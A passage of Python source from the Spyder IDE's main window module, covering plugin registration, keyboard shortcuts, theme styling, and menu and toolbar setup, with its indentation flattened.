QMessageBox, QShortcut, QStyleFactory, QCheckBox)
# Avoid a "Cannot mix incompatible Qt library" error on Windows platforms
from qtpy import QtSvg # analysis:ignore
# Avoid a bug in Qt: https://bugreports.qt.io/browse/QTBUG-46720
from qtpy import QtWebEngineWidgets # analysis:ignore
from qtawesome.iconic_font import FontError
#==============================================================================
# Local imports
# NOTE: Move (if possible) import's of widgets and plugins exactly where they
# are needed in MainWindow to speed up perceived startup time (i.e. the time
# from clicking the Spyder icon to showing the splash screen).
#==============================================================================
from spyder import __version__
from spyder import dependencies
from spyder.app import tour
from spyder.app.utils import (create_splash_screen, delete_lsp_log_files,
qt_message_handler, set_links_color,
setup_logging, set_opengl_implementation, Spy)
from spyder.config.base import (_, DEV, get_conf_path, get_debug_level,
get_home_dir, get_module_source_path,
get_safe_mode, is_pynsist, running_in_mac_app,
running_under_pytest, STDERR)
from spyder.utils.image_path_manager import get_image_path
from spyder.config.gui import is_dark_font_color
from spyder.config.main import OPEN_FILES_PORT
from spyder.config.manager import CONF
from spyder.config.utils import IMPORT_EXT, is_gtk_desktop
from spyder.otherplugins import get_spyderplugins_mods
from spyder.py3compat import configparser as cp, PY3, to_text_string
from spyder.utils import encoding, programs
from spyder.utils.icon_manager import ima
from spyder.utils.misc import (select_port, getcwd_or_home,
get_python_executable)
from spyder.utils.palette import QStylePalette
from spyder.utils.qthelpers import (create_action, add_actions, file_uri,
qapplication, start_file)
from spyder.utils.stylesheet import APP_STYLESHEET
from spyder.app.solver import (
find_external_plugins, find_internal_plugins, solve_plugin_dependencies)
# Spyder API Imports
from spyder.api.exceptions import SpyderAPIError
from spyder.api.plugins import Plugins, SpyderPluginV2, SpyderDockablePlugin
#==============================================================================
# Windows only local imports
#==============================================================================
set_attached_console_visible = None
is_attached_console_visible = None
set_windows_appusermodelid = None
if os.name == 'nt':
from spyder.utils.windows import (set_attached_console_visible,
set_windows_appusermodelid)
#==============================================================================
# Constants
#==============================================================================
# Module logger
logger = logging.getLogger(__name__)
# Keeping a reference to the original sys.exit before patching it
ORIGINAL_SYS_EXIT = sys.exit
# Get the cwd before initializing WorkingDirectory, which sets it to the one
# used in the last session
CWD = getcwd_or_home()
# Set the index for the default tour
DEFAULT_TOUR = 0
#==============================================================================
# Install Qt messaage handler
#==============================================================================
qInstallMessageHandler(qt_message_handler)
#==============================================================================
# Main Window
#==============================================================================
class MainWindow(QMainWindow):
"""Spyder main window"""
DOCKOPTIONS = (
QMainWindow.AllowTabbedDocks | QMainWindow.AllowNestedDocks |
QMainWindow.AnimatedDocks
)
SPYDER_PATH = get_conf_path('path')
SPYDER_NOT_ACTIVE_PATH = get_conf_path('not_active_path')
DEFAULT_LAYOUTS = 4
# Signals
restore_scrollbar_position = Signal()
sig_setup_finished = Signal()
all_actions_defined = Signal()
# type: (OrderedDict, OrderedDict)
sig_pythonpath_changed = Signal(object, object)
sig_main_interpreter_changed = Signal()
sig_open_external_file = Signal(str)
sig_resized = Signal("QResizeEvent") # Related to interactive tour
sig_moved = Signal("QMoveEvent") # Related to interactive tour
sig_layout_setup_ready = Signal(object) # Related to default layouts
# --- Plugin handling methods
# ------------------------------------------------------------------------
def get_plugin(self, plugin_name, error=True):
"""
Return a plugin instance by providing the plugin class.
"""
for name, plugin in self._PLUGINS.items():
if plugin_name == name:
return plugin
else:
if error:
raise SpyderAPIError(
'Plugin "{}" not found!'.format(plugin_name))
else:
return None
def show_status_message(self, message, timeout):
"""
Show a status message in Spyder Main Window.
"""
status_bar = self.statusBar()
if status_bar.isVisible():
status_bar.showMessage(message, timeout)
def show_plugin_compatibility_message(self, message):
"""
Show a compatibility message.
"""
messageBox = QMessageBox(self)
messageBox.setWindowModality(Qt.NonModal)
messageBox.setAttribute(Qt.WA_DeleteOnClose)
messageBox.setWindowTitle(_('Compatibility Check'))
messageBox.setText(message)
messageBox.setStandardButtons(QMessageBox.Ok)
messageBox.show()
def add_plugin(self, plugin, external=False):
"""
Add plugin to plugins dictionary.
"""
self._PLUGINS[plugin.NAME] = plugin
if external:
self._EXTERNAL_PLUGINS[plugin.NAME] = plugin
else:
self._INTERNAL_PLUGINS[plugin.NAME] = plugin
def register_plugin(self, plugin, external=False):
"""
Register a plugin in Spyder Main Window.
"""
self.set_splash(_("Loading {}...").format(plugin.get_name()))
logger.info("Loading {}...".format(plugin.NAME))
# Check plugin compatibility
is_compatible, message = plugin.check_compatibility()
plugin.is_compatible = is_compatible
plugin.get_description()
if not is_compatible:
self.show_compatibility_message(message)
return
# Signals
plugin.sig_exception_occurred.connect(self.handle_exception)
plugin.sig_free_memory_requested.connect(self.free_memory)
plugin.sig_quit_requested.connect(self.close)
plugin.sig_restart_requested.connect(self.restart)
plugin.sig_redirect_stdio_requested.connect(
self.redirect_internalshell_stdio)
plugin.sig_status_message_requested.connect(self.show_status_message)
if isinstance(plugin, SpyderDockablePlugin):
plugin.sig_focus_changed.connect(self.plugin_focus_changed)
plugin.sig_switch_to_plugin_requested.connect(
self.switch_to_plugin)
plugin.sig_update_ancestor_requested.connect(
lambda: plugin.set_ancestor(self))
# Register plugin
plugin._register()
plugin.register()
if isinstance(plugin, SpyderDockablePlugin):
# Add dockwidget
self.add_dockwidget(plugin)
# Update margins
margin = 0
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
plugin.update_margins(margin)
self.add_plugin(plugin, external=external)
logger.info("Registering shortcuts for {}...".format(plugin.NAME))
for action_name, action in plugin.get_actions().items():
context = (getattr(action, 'shortcut_context', plugin.NAME)
or plugin.NAME)
if getattr(action, 'register_shortcut', True):
if isinstance(action_name, Enum):
action_name = action_name.value
self.register_shortcut(action, context, action_name)
if isinstance(plugin, SpyderDockablePlugin):
try:
context = '_'
name = 'switch to {}'.format(plugin.CONF_SECTION)
shortcut = CONF.get_shortcut(context, name,
plugin_name=plugin.CONF_SECTION)
except (cp.NoSectionError, cp.NoOptionError):
shortcut = None
sc = QShortcut(QKeySequence(), self,
lambda: self.switch_to_plugin(plugin))
sc.setContext(Qt.ApplicationShortcut)
plugin._shortcut = sc
self.register_shortcut(sc, context, name)
self.register_shortcut(plugin.toggle_view_action, context, name)
def unregister_plugin(self, plugin):
"""
Unregister a plugin from the Spyder Main Window.
"""
logger.info("Unloading {}...".format(plugin.NAME))
# Disconnect all slots
signals = [
plugin.sig_quit_requested,
plugin.sig_redirect_stdio,
plugin.sig_status_message_requested,
]
for sig in signals:
try:
sig.disconnect()
except TypeError:
pass
# Unregister shortcuts for actions
logger.info("Unregistering shortcuts for {}...".format(plugin.NAME))
for action_name, action in plugin.get_actions().items():
context = (getattr(action, 'shortcut_context', plugin.NAME)
or plugin.NAME)
self.unregister_shortcut(action, context, action_name)
# Unregister switch to shortcut
try:
context = '_'
name = 'switch to {}'.format(plugin.CONF_SECTION)
shortcut = CONF.get_shortcut(context, name,
plugin_name=plugin.CONF_SECTION)
except Exception:
pass
if shortcut is not None:
self.unregister_shortcut(
plugin._shortcut,
context,
"Switch to {}".format(plugin.CONF_SECTION),
)
# Remove dockwidget
logger.info("Removing {} dockwidget...".format(plugin.NAME))
self.remove_dockwidget(plugin)
plugin.unregister()
plugin._unregister()
def create_plugin_conf_widget(self, plugin):
"""
Create configuration dialog box page widget.
"""
config_dialog = self.prefs_dialog_instance
if plugin.CONF_WIDGET_CLASS is not None and config_dialog is not None:
conf_widget = plugin.CONF_WIDGET_CLASS(plugin, config_dialog)
conf_widget.initialize()
return conf_widget
@property
def last_plugin(self):
"""
Get last plugin with focus if it is a dockable widget.
If a non-dockable plugin has the focus this will return by default
the Editor plugin.
"""
# Needed to prevent errors with the old API at
# spyder/plugins/base::_switch_to_plugin
return self.layouts.get_last_plugin()
def maximize_dockwidget(self, restore=False):
"""
This is needed to prevent errors with the old API at
spyder/plugins/base::_switch_to_plugin.
See spyder-ide/spyder#15164
Parameters
----------
restore : bool, optional
If the current dockwidget needs to be restored to its unmaximized
state. The default is False.
"""
self.layouts.maximize_dockwidget(restore=restore)
def switch_to_plugin(self, plugin, force_focus=None):
"""
Switch to this plugin.
Notes
-----
This operation unmaximizes the current plugin (if any), raises
this plugin to view (if it's hidden) and gives it focus (if
possible).
"""
last_plugin = self.last_plugin
try:
# New API
if (last_plugin is not None
and last_plugin.get_widget().is_maximized
and last_plugin is not plugin):
self.layouts.maximize_dockwidget()
except AttributeError:
# Old API
if (last_plugin is not None and self.last_plugin._ismaximized
and last_plugin is not plugin):
self.layouts.maximize_dockwidget()
try:
# New API
if not plugin.toggle_view_action.isChecked():
plugin.toggle_view_action.setChecked(True)
plugin.get_widget().is_visible = False
except AttributeError:
# Old API
if not plugin._toggle_view_action.isChecked():
plugin._toggle_view_action.setChecked(True)
plugin._widget._is_visible = False
plugin.change_visibility(True, force_focus=force_focus)
def remove_dockwidget(self, plugin):
"""
Remove a plugin QDockWidget from the main window.
"""
self.removeDockWidget(plugin.dockwidget)
self.widgetlist.remove(plugin)
def tabify_plugins(self, first, second):
"""Tabify plugin dockwigdets."""
self.tabifyDockWidget(first.dockwidget, second.dockwidget)
def tabify_plugin(self, plugin, default=None):
"""
Tabify the plugin using the list of possible TABIFY options.
Only do this if the dockwidget does not have more dockwidgets
in the same position and if the plugin is using the New API.
"""
def tabify_helper(plugin, next_to_plugins):
for next_to_plugin in next_to_plugins:
try:
self.tabify_plugins(next_to_plugin, plugin)
break
except SpyderAPIError as err:
logger.error(err)
# If TABIFY not defined use the [default]
tabify = getattr(plugin, 'TABIFY', [default])
if not isinstance(tabify, list):
next_to_plugins = [tabify]
else:
next_to_plugins = tabify
# Check if TABIFY is not a list with None as unique value or a default
# list
if tabify in [[None], []]:
return False
# Get the actual plugins from the names
next_to_plugins = [self.get_plugin(p) for p in next_to_plugins]
# First time plugin starts
if plugin.get_conf('first_time', True):
if (isinstance(plugin, SpyderDockablePlugin)
and plugin.NAME != Plugins.Console):
logger.info(
"Tabify {} dockwidget for the first time...".format(
plugin.NAME))
tabify_helper(plugin, next_to_plugins)
plugin.set_conf('enable', True)
plugin.set_conf('first_time', False)
else:
# This is needed to ensure new plugins are placed correctly
# without the need for a layout reset.
logger.info("Tabify {} dockwidget...".format(plugin.NAME))
# Check if plugin has no other dockwidgets in the same position
if not bool(self.tabifiedDockWidgets(plugin.dockwidget)):
tabify_helper(plugin, next_to_plugins)
return True
def handle_exception(self, error_data):
"""
This method will call the handle exception method of the Console
plugin. It is provided as a signal on the Plugin API for convenience,
so that plugin do not need to explicitly call the Console plugin.
Parameters
----------
error_data: dict
The dictionary containing error data. The expected keys are:
>>> error_data= {
"text": str,
"is_traceback": bool,
"repo": str,
"title": str,
"label": str,
"steps": str,
}
Notes
-----
The `is_traceback` key indicates if `text` contains plain text or a
Python error traceback.
The `title` and `repo` keys indicate how the error data should
customize the report dialog and Github error submission.
The `label` and `steps` keys allow customizing the content of the
error dialog.
"""
if self.console:
self.console.handle_exception(error_data)
def __init__(self, splash=None, options=None):
QMainWindow.__init__(self)
qapp = QApplication.instance()
if running_under_pytest():
self._proxy_style = None
else:
from spyder.utils.qthelpers import SpyderProxyStyle
# None is needed, see: https://bugreports.qt.io/browse/PYSIDE-922
self._proxy_style = SpyderProxyStyle(None)
# Enabling scaling for high dpi
qapp.setAttribute(Qt.AA_UseHighDpiPixmaps)
self.default_style = str(qapp.style().objectName())
self.init_workdir = options.working_directory
self.profile = options.profile
self.multithreaded = options.multithreaded
self.new_instance = options.new_instance
if options.project is not None and not running_in_mac_app():
self.open_project = osp.normpath(osp.join(CWD, options.project))
else:
self.open_project = None
self.window_title = options.window_title
logger.info("Start of MainWindow constructor")
def signal_handler(signum, frame=None):
"""Handler for signals."""
sys.stdout.write('Handling signal: %s\n' % signum)
sys.stdout.flush()
QApplication.quit()
if os.name == "nt":
try:
import win32api
win32api.SetConsoleCtrlHandler(signal_handler, True)
except ImportError:
pass
else:
signal.signal(signal.SIGTERM, signal_handler)
if not DEV:
# Make spyder quit when presing ctrl+C in the console
# In DEV Ctrl+C doesn't quit, because it helps to
# capture the traceback when spyder freezes
signal.signal(signal.SIGINT, signal_handler)
# Use a custom Qt stylesheet
if sys.platform == 'darwin':
spy_path = get_module_source_path('spyder')
img_path = osp.join(spy_path, 'images')
mac_style = open(osp.join(spy_path, 'app', 'mac_stylesheet.qss')).read()
mac_style = mac_style.replace('$IMAGE_PATH', img_path)
self.setStyleSheet(mac_style)
# Shortcut management data
self.shortcut_data = []
# Handle Spyder path
self.path = ()
self.not_active_path = ()
self.project_path = ()
# New API
self._APPLICATION_TOOLBARS = OrderedDict()
self._STATUS_WIDGETS = OrderedDict()
self._PLUGINS = OrderedDict()
self._EXTERNAL_PLUGINS = OrderedDict()
self._INTERNAL_PLUGINS = OrderedDict()
# Mapping of new plugin identifiers vs old attributtes
# names given for plugins or to prevent collisions with other
# attributes, i.e layout (Qt) vs layout (SpyderPluginV2)
self._INTERNAL_PLUGINS_MAPPING = {
'console': Plugins.Console,
'maininterpreter': Plugins.MainInterpreter,
'outlineexplorer': Plugins.OutlineExplorer,
'variableexplorer': Plugins.VariableExplorer,
'ipyconsole': Plugins.IPythonConsole,
'workingdirectory': Plugins.WorkingDirectory,
'projects': Plugins.Projects,
'findinfiles': Plugins.Find,
'layouts': Plugins.Layout,
}
self.thirdparty_plugins = []
# Tour
# TODO: Should be a plugin
self.tour = None
self.tours_available = None
self.tour_dialog = None
# File switcher
self.switcher = None
# Preferences
self.prefs_dialog_size = None
self.prefs_dialog_instance = None
# Actions
self.undo_action = None
self.redo_action = None
self.copy_action = None
self.cut_action = None
self.paste_action = None
self.selectall_action = None
# Menu bars
self.edit_menu = None
self.edit_menu_actions = []
self.search_menu = None
self.search_menu_actions = []
self.source_menu = None
self.source_menu_actions = []
self.run_menu = None
self.run_menu_actions = []
self.debug_menu = None
self.debug_menu_actions = []
self.consoles_menu = None
self.consoles_menu_actions = []
self.projects_menu = None
self.projects_menu_actions = []
# TODO: Move to corresponding Plugins
self.main_toolbar = None
self.main_toolbar_actions = []
self.file_toolbar = None
self.file_toolbar_actions = []
self.run_toolbar = None
self.run_toolbar_actions = []
self.debug_toolbar = None
self.debug_toolbar_actions = []
self.menus = []
if running_under_pytest():
# Show errors in internal console when testing.
CONF.set('main', 'show_internal_errors', False)
self.CURSORBLINK_OSDEFAULT = QApplication.cursorFlashTime()
if set_windows_appusermodelid != None:
res = set_windows_appusermodelid()
logger.info("appusermodelid: %s", res)
# Setting QTimer if running in travis
test_app = os.environ.get('TEST_CI_APP')
if test_app is not None:
app = qapplication()
timer_shutdown_time = 30000
self.timer_shutdown = QTimer(self)
self.timer_shutdown.timeout.connect(app.quit)
self.timer_shutdown.start(timer_shutdown_time)
# Showing splash screen
self.splash = splash
if CONF.get('main', 'current_version', '') != __version__:
CONF.set('main', 'current_version', __version__)
# Execute here the actions to be performed only once after
# each update (there is nothing there for now, but it could
# be useful some day...)
# List of satellite widgets (registered in add_dockwidget):
self.widgetlist = []
# Flags used if closing() is called by the exit() shell command
self.already_closed = False
self.is_starting_up = True
self.is_setting_up = True
self.floating_dockwidgets = []
self.window_size = None
self.window_position = None
# To keep track of the last focused widget
self.last_focused_widget = None
self.previous_focused_widget = None
# Keep track of dpi message
self.show_dpi_message = True
# Server to open external files on a single instance
# This is needed in order to handle socket creation problems.
# See spyder-ide/spyder#4132.
if os.name == 'nt':
try:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
except OSError:
self.open_files_server = None
QMessageBox.warning(None, "Spyder",
_("An error occurred while creating a socket needed "
"by Spyder. Please, try to run as an Administrator "
"from cmd.exe the following command and then "
"restart your computer: <br><br><span "
"style=\'color: {color}\'><b>netsh winsock reset "
"</b></span><br>").format(
color=QStylePalette.COLOR_BACKGROUND_4))
else:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
# To show the message about starting the tour
self.sig_setup_finished.connect(self.show_tour_message)
# Apply main window settings
self.apply_settings()
# To set all dockwidgets tabs to be on top (in case we want to do it
# in the future)
# self.setTabPosition(Qt.AllDockWidgetAreas, QTabWidget.North)
logger.info("End of MainWindow constructor")
# --- Window setup
def _update_shortcuts_in_panes_menu(self, show=True):
"""
Display the shortcut for the "Switch to plugin..." on the toggle view
action of the plugins displayed in the Help/Panes menu.
Notes
-----
SpyderDockablePlugins provide two actions that function as a single
action. The `Switch to Plugin...` action has an assignable shortcut
via the shortcut preferences. The `Plugin toggle View` in the `View`
application menu, uses a custom `Toggle view action` that displays the
shortcut assigned to the `Switch to Plugin...` action, but is not
triggered by that shortcut.
"""
for plugin_id, plugin in self._PLUGINS.items():
if isinstance(plugin, SpyderDockablePlugin):
try:
# New API
action = plugin.toggle_view_action
except AttributeError:
# Old API
action = plugin._toggle_view_action
if show:
section = plugin.CONF_SECTION
try:
context = '_'
name = 'switch to {}'.format(section)
shortcut = CONF.get_shortcut(
context, name, plugin_name=section)
except (cp.NoSectionError, cp.NoOptionError):
shortcut = QKeySequence()
else:
shortcut = QKeySequence()
action.setShortcut(shortcut)
def setup(self):
"""Setup main window."""
# TODO: Remove circular dependency between help and ipython console
# and remove this import. Help plugin should take care of it
from spyder.plugins.help.utils.sphinxify import CSS_PATH, DARK_CSS_PATH
logger.info("*** Start of MainWindow setup ***")
logger.info("Updating PYTHONPATH")
path_dict = self.get_spyder_pythonpath_dict()
self.update_python_path(path_dict)
logger.info("Applying theme configuration...")
ui_theme = CONF.get('appearance', 'ui_theme')
color_scheme = CONF.get('appearance', 'selected')
if ui_theme == 'dark':
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
dark_qss = str(APP_STYLESHEET)
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
elif ui_theme == 'light':
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
light_qss = str(APP_STYLESHEET)
self.setStyleSheet(light_qss)
self.statusBar().setStyleSheet(light_qss)
css_path = CSS_PATH
elif ui_theme == 'automatic':
if not is_dark_font_color(color_scheme):
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
dark_qss = str(APP_STYLESHEET)
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
else:
light_qss = str(APP_STYLESHEET)
self.setStyleSheet(light_qss)
self.statusBar().setStyleSheet(light_qss)
css_path = CSS_PATH
# Set css_path as a configuration to be used by the plugins
CONF.set('appearance', 'css_path', css_path)
# Status bar
status = self.statusBar()
status.setObjectName("StatusBar")
status.showMessage(_("Welcome to Spyder!"), 5000)
# Switcher instance
logger.info("Loading switcher...")
self.create_switcher()
message = _(
"Spyder Internal Console\n\n"
"This console is used to report application\n"
"internal errors and to inspect Spyder\n"
"internals with the following commands:\n"
" spy.app, spy.window, dir(spy)\n\n"
"Please don't use it to run your code\n\n"
)
CONF.set('internal_console', 'message', message)
CONF.set('internal_console', 'multithreaded', self.multithreaded)
CONF.set('internal_console', 'profile', self.profile)
CONF.set('internal_console', 'commands', [])
CONF.set('internal_console', 'namespace', {})
CONF.set('internal_console', 'show_internal_errors', True)
# Working directory initialization
CONF.set('workingdir', 'init_workdir', self.init_workdir)
# Load and register internal and external plugins
external_plugins = find_external_plugins()
internal_plugins = find_internal_plugins()
all_plugins = external_plugins.copy()
all_plugins.update(internal_plugins.copy())
# Determine 'enable' config for the plugins that have it
enabled_plugins = {}
for plugin in all_plugins.values():
plugin_name = plugin.NAME
plugin_main_attribute_name = (
self._INTERNAL_PLUGINS_MAPPING[plugin_name]
if plugin_name in self._INTERNAL_PLUGINS_MAPPING
else plugin_name)
try:
if CONF.get(plugin_main_attribute_name, "enable"):
enabled_plugins[plugin_name] = plugin
except (cp.NoOptionError, cp.NoSectionError):
enabled_plugins[plugin_name] = plugin
# Get ordered list of plugins classes and instantiate them
plugin_deps = solve_plugin_dependencies(list(enabled_plugins.values()))
for plugin_class in plugin_deps:
plugin_name = plugin_class.NAME
# Non-migrated plugins
if plugin_name in [
Plugins.Editor,
Plugins.IPythonConsole,
Plugins.Projects]:
if plugin_name == Plugins.IPythonConsole:
plugin_instance = plugin_class(self)
plugin_instance.sig_exception_occurred.connect(
self.handle_exception)
else:
plugin_instance = plugin_class(self)
plugin_instance.register_plugin()
self.add_plugin(plugin_instance)
if plugin_name == Plugins.Projects:
self.project_path = plugin_instance.get_pythonpath(
at_start=True)
else:
self.preferences.register_plugin_preferences(
plugin_instance)
# Migrated or new plugins
elif plugin_name in [
Plugins.MainMenu,
Plugins.OnlineHelp,
Plugins.Toolbar,
Plugins.Preferences,
Plugins.Appearance,
Plugins.Run,
Plugins.Shortcuts,
Plugins.StatusBar,
Plugins.Completions,
Plugins.OutlineExplorer,
Plugins.Console,
Plugins.MainInterpreter,
Plugins.Breakpoints,
Plugins.History,
Plugins.Profiler,
Plugins.Explorer,
Plugins.Help,
Plugins.Plots,
Plugins.VariableExplorer,
Plugins.Application,
Plugins.Find,
Plugins.Pylint,
Plugins.WorkingDirectory,
Plugins.Layout]:
plugin_instance = plugin_class(self, configuration=CONF)
self.register_plugin(plugin_instance)
# TODO: Check thirdparty attribute usage
# For now append plugins to the thirdparty attribute as was
# being done
if plugin_name in [
Plugins.Breakpoints,
Plugins.Profiler,
Plugins.Pylint]:
self.thirdparty_plugins.append(plugin_instance)
# Load external_plugins adding their dependencies
elif (issubclass(plugin_class, SpyderPluginV2) and
plugin_class.NAME in external_plugins):
try:
plugin_instance = plugin_class(
self,
configuration=CONF,
)
self.register_plugin(plugin_instance, external=True)
# These attributes come from spyder.app.solver to add
# plugins to the dependencies dialog
if not running_under_pytest():
module = plugin_class._spyder_module_name
package_name = plugin_class._spyder_package_name
version = plugin_class._spyder_version
description = plugin_instance.get_description()
dependencies.add(
module, package_name, description, version, None,
kind=dependencies.PLUGIN)
except Exception as error:
print("%s: %s" % (plugin_class, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
self.set_splash(_("Loading old third-party plugins..."))
for mod in get_spyderplugins_mods():
try:
plugin = mod.PLUGIN_CLASS(self)
if plugin.check_compatibility()[0]:
if hasattr(plugin, 'CONFIGWIDGET_CLASS'):
self.preferences.register_plugin_preferences(plugin)
if hasattr(plugin, 'COMPLETION_PROVIDER_NAME'):
self.completions.register_completion_plugin(plugin)
else:
self.thirdparty_plugins.append(plugin)
plugin.register_plugin()
# Add to dependencies dialog
module = mod.__name__
name = module.replace('_', '-')
if plugin.DESCRIPTION:
description = plugin.DESCRIPTION
else:
description = plugin.get_plugin_title()
dependencies.add(module, name, description,
'', None, kind=dependencies.PLUGIN)
except TypeError:
# Fixes spyder-ide/spyder#13977
pass
except Exception as error:
print("%s: %s" % (mod, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
# Set window title
self.set_window_title()
# Menus
# TODO: Remove when all menus are migrated to use the Main Menu Plugin
logger.info("Creating Menus...")
from spyder.api.widgets.menus import SpyderMenu
from spyder.plugins.mainmenu.api import (
ApplicationMenus, HelpMenuSections, ToolsMenuSections,
FileMenuSections)
mainmenu = self.mainmenu
self.edit_menu = mainmenu.get_application_menu("edit_menu")
self.search_menu = mainmenu.get_application_menu("search_menu")
self.source_menu = mainmenu.get_application_menu("source_menu")
self.source_menu.aboutToShow.connect(self.update_source_menu)
self.run_menu = mainmenu.get_application_menu("run_menu")
self.debug_menu = mainmenu.get_application_menu("debug_menu")
self.consoles_menu = mainmenu.get_application_menu("consoles_menu")
self.consoles_menu.aboutToShow.connect(
self.update_execution_state_kernel)
self.projects_menu = mainmenu.get_application_menu("projects_menu")
self.projects_menu.aboutToShow.connect(self.valid_project)
# Switcher shortcuts
self.file_switcher_action = create_action(
self,
_('File switcher...'),
icon=ima.icon('filelist'),
tip=_('Fast switch between files'),
triggered=self.open_switcher,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.file_switcher_action, context="_",
name="File switcher")
self.symbol_finder_action = create_action(
self, _('Symbol finder...'),
icon=ima.icon('symbol_find'),
tip=_('Fast symbol search in file'),
triggered=self.open_symbolfinder,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.symbol_finder_action, context="_",
name="symbol finder", add_shortcut_to_tip=True)
def create_edit_action(text, tr_text, icon):
textseq = text.split(' ')
method_name = textseq[0].lower()+"".join(textseq[1:])
action = create_action(self, tr_text,
icon=icon,
triggered=self.global_callback,
data=method_name,
context=Qt.WidgetShortcut)
self.register_shortcut(action, "Editor", text)
return action
self.undo_action = create_edit_action('Undo', _('Undo'),
ima.icon('undo'))
self.redo_action = create_edit_action('Redo', _('Redo'),
ima.icon('redo'))
self.copy_action = create_edit_action('Copy', _('Copy'),
ima.icon('editcopy'))
self.cut_action = create_edit_action('Cut', _('Cut'),
ima.icon('editcut'))
self.paste_action = create_edit_action('Paste', _('Paste'),
ima.icon('editpaste'))
self.selectall_action = create_edit_action("Select All",
_("Select All"),
ima.icon('selectall'))
self.edit_menu_actions += [self.undo_action, self.redo_action,
None, self.cut_action, self.copy_action,
self.paste_action, self.selectall_action,
None] + self.editor.edit_menu_actions
switcher_actions = [
self.file_switcher_action,
self.symbol_finder_action
]
for switcher_action in switcher_actions:
mainmenu.add_item_to_application_menu(
switcher_action,
menu_id=ApplicationMenus.File,
section=FileMenuSections.Switcher,
before_section=FileMenuSections.Restart)
self.set_splash("")
# Toolbars
# TODO: Remove after finishing the migration
logger.info("Creating toolbars...")
toolbar = self.toolbar
self.file_toolbar = toolbar.get_application_toolbar("file_toolbar")
self.run_toolbar = toolbar.get_application_toolbar("run_toolbar")
self.debug_toolbar = toolbar.get_application_toolbar("debug_toolbar")
self.main_toolbar = toolbar.get_application_toolbar("main_toolbar")
# Tools + External Tools (some of this depends on the Application
# plugin)
logger.info("Creating Tools menu...")
spyder_path_action = create_action(
self,
_("PYTHONPATH manager"),
None, icon=ima.icon('pythonpath'),
triggered=self.show_path_manager,
tip=_("PYTHONPATH manager"),
menurole=QAction.ApplicationSpecificRole)
from spyder.plugins.application.plugin import (
ApplicationActions, WinUserEnvDialog)
winenv_action = None
if WinUserEnvDialog:
winenv_action = self.application.get_action(
ApplicationActions.SpyderWindowsEnvVariables)
mainmenu.add_item_to_application_menu(
spyder_path_action,
menu_id=ApplicationMenus.Tools,
section=ToolsMenuSections.Tools,
before=winenv_action
)
if get_debug_level() >= 3:
self.menu_lsp_logs = QMenu(_("LSP logs"))
self.menu_lsp_logs.aboutToShow.connect(self.update_lsp_logs)
mainmenu.add_item_to_application_menu(
self.menu_lsp_logs,
menu_id=ApplicationMenus.Tools)
# Main toolbar
from spyder.plugins.toolbar.api import (
ApplicationToolbars, MainToolbarSections)
self.toolbar.add_item_to_application_toolbar(
spyder_path_action,
toolbar_id=ApplicationToolbars.Main,
section=MainToolbarSections.ApplicationSection
)
self.set_splash(_("Setting up main window..."))
#----- Tours
# TODO: Move tours to a plugin structure
self.tour = tour.AnimatedTour(self)
# self.tours_menu = QMenu(_("Interactive tours"), self)
# self.tour_menu_actions = []
# # TODO: Only show intro tour for now. When we are close to finish
# # 3.0, we will finish and show the other tour
self.tours_available = tour.get_tours(DEFAULT_TOUR)
for i, tour_available in enumerate(self.tours_available):
self.tours_available[i]['last'] = 0
tour_name = tour_available['name']
# def trigger(i=i, self=self): # closure needed!
# return lambda: self.show_tour(i)
# temp_action = create_action(self, tour_name, tip="",
# triggered=trigger())
# self.tour_menu_actions += [temp_action]
# self.tours_menu.addActions(self.tour_menu_actions)
self.tour_action = create_action(
self,
self.tours_available[DEFAULT_TOUR]['name'],
tip=_("Interactive tour introducing Spyder's panes and features"),
triggered=lambda: self.show_tour(DEFAULT_TOUR))
mainmenu.add_item_to_application_menu(
self.tour_action,
menu_id=ApplicationMenus.Help,
section=HelpMenuSections.Documentation)
# TODO: Move to plugin
# IPython documentation
if self.help is not None:
self.ipython_menu = SpyderMenu(
parent=self,
title=_("IPython documentation"))
intro_action = create_action(
self,
_("Intro to IPython"),
triggered=self.ipyconsole.show_intro)
quickref_action = create_action(
self,
_("Quick reference"),
triggered=self.ipyconsole.show_quickref)
guiref_action = create_action(
self,
_("Console help"),
triggered=self.ipyconsole.show_guiref)
add_actions(
self.ipython_menu,
(intro_action, guiref_action, quickref_action))
mainmenu.add_item_to_application_menu(
self.ipython_menu,
menu_id=ApplicationMenus.Help,
section=HelpMenuSections.ExternalDocumentation,
before_section=HelpMenuSections.About)
# TODO: Migrate to use the MainMenu Plugin instead of list of actions
# Filling out menu/toolbar entries:
add_actions(self.edit_menu, self.edit_menu_actions)
add_actions(self.search_menu, self.search_menu_actions)
add_actions(self.source_menu, self.source_menu_actions)
add_actions(self.run_menu, self.run_menu_actions)
add_actions(self.debug_menu, self.debug_menu_actions)
add_actions(self.consoles_menu, self.consoles_menu_actions)
add_actions(self.projects_menu, self.projects_menu_actions)
# Emitting the signal notifying plugins that main window menu and
# toolbar actions are all defined:
self.all_actions_defined.emit()
def __getattr__(self, attr):
"""
Redefinition of __getattr__ to enable access to plugins.
Loaded plugins can be accessed as attributes of the mainwindow
as before, e.g self.console or self.main.console, preserving the
same accessor as before.
"""
# Mapping of new plugin identifiers vs old attributtes
# names given for plugins
if attr in self._INTERNAL_PLUGINS_MAPPING.keys():
return self.get_plugin(self._INTERNAL_PLUGINS_MAPPING[attr])
try:
return self.get_plugin(attr)
except SpyderAPIError:
pass
return super().__getattr__(attr)
def update_lsp_logs(self):
"""Create an action for each lsp log file."""
self.menu_lsp_logs.clear()
lsp_logs = []
